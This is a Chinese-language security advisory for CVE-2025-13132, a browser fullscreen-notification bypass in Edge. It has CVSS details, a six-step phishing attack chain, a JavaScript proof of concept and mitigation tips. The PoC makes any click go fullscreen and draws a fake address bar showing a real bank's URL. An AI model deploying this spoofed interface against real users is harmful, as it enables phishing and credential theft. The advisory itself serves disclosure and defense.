CVE-2025-13132 浏览器全屏通知绕过漏洞

漏洞信息

漏洞编号

CVE-2025-13132

漏洞类型

UI欺骗/安全绕过

CVSS评分

7.4 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Edge浏览器

漏洞概述

CVE-2025-13132是一个影响浏览器的安全漏洞，该漏洞允许恶意网站在用户点击后进入全屏模式，但不会显示全屏通知提示。这一安全缺陷使得攻击者可以伪造逼真的用户界面，包括虚假的地址栏和其他浏览器UI元素，从而实施钓鱼攻击。由于用户无法得知网站已进入全屏模式，攻击者可以利用这一信任缺失来窃取用户凭据、敏感信息或进行其他欺诈行为。该漏洞的CVSS评分为7.4，属于高危级别，需要用户交互才能触发，但攻击复杂度较低，对完整性影响较高。

技术细节

该漏洞存在于浏览器的全屏API实现中。当网站调用Fullscreen API时，浏览器应该显示一个通知toast来告知用户当前页面已进入全屏模式。然而，CVE-2025-13132允许攻击者绕过这一通知机制。攻击者可以通过精心构造的JavaScript代码调用requestFullscreen()方法，在用户不知情的情况下将页面切换到全屏模式。在全屏状态下，攻击者可以渲染一个与真实浏览器UI极为相似的假界面，包括地址栏、标签栏等。由于缺少原始的全屏通知，用户可能无法区分这是伪造的界面还是真实的浏览器界面，从而被诱骗输入敏感信息或执行危险操作。攻击者还可以利用CSS和HTML来精确复制浏览器外观，增强欺骗效果。

攻击链分析

STEP 1

步骤1

攻击者创建一个恶意网页，包含用于触发全屏API的JavaScript代码和伪造浏览器UI的HTML/CSS

STEP 2

步骤2

用户访问该恶意网站并点击页面任意位置

STEP 3

步骤3

JavaScript调用requestFullscreen()方法，浏览器进入全屏模式但不显示全屏通知toast

STEP 4

步骤4

恶意页面立即渲染虚假的浏览器UI，包括地址栏、后退/前进按钮等元素

STEP 5

步骤5

用户误以为这是真实的浏览器界面，可能在伪造的登录框中输入凭据或执行其他敏感操作

STEP 6

步骤6

攻击者收集用户输入的敏感信息，完成钓鱼攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-13132 PoC - Fullscreen Notification Bypass
// This PoC demonstrates the fullscreen notification bypass vulnerability

// Method to trigger fullscreen without proper notification
async function triggerFullscreenBypass() {
    try {
        // Request fullscreen on user click
        await document.documentElement.requestFullscreen();
        
        // After entering fullscreen, render fake browser UI
        setTimeout(() => {
            renderFakeBrowserUI();
        }, 100);
    } catch (error) {
        console.log('Fullscreen request failed:', error);
    }
}

// Render fake browser UI to deceive users
function renderFakeBrowserUI() {
    const fakeUI = document.createElement('div');
    fakeUI.id = 'fake-browser-ui';
    fakeUI.innerHTML = `
        <div style="
            position: fixed;
            top: 0;
            left: 0;
            right: 0;
            height: 40px;
            background: #f0f0f0;
            border-bottom: 1px solid #ccc;
            display: flex;
            align-items: center;
            padding: 0 10px;
            z-index: 999999;
            font-family: Arial, sans-serif;
            font-size: 13px;
        ">
            <div style="display:flex; gap:8px; margin-right:15px;">
                <span style="color:#ea4335">●</span>
                <span style="color:#fbbc05">●</span>
                <span style="color:#34a853">●</span>
            </div>
            <div style="
                flex: 1;
                background: white;
                border: 1px solid #ddd;
                border-radius: 4px;
                padding: 4px 10px;
                color: #666;
            ">https://www.bankofchina.com</div>
        </div>
    `;
    document.body.appendChild(fakeUI);
}

// Attach click listener to trigger
document.addEventListener('click', triggerFullscreenBypass);

console.log('CVE-2025-13132 PoC loaded - Click anywhere to trigger fullscreen bypass');

影响范围

Edge浏览器 < 受影响版本

基于Chromium的浏览器（受影响版本）

防御指南

临时缓解措施

用户应保持浏览器更新到最新版本，避免点击不可信网站的链接或按钮，特别是那些诱导点击的页面。在进行敏感操作（如登录、支付）时，可以通过按ESC键或F11检查是否处于全屏模式，或者使用任务管理器结束浏览器进程来退出可能的伪造界面。企业用户应部署浏览器安全解决方案，监控异常的全屏行为。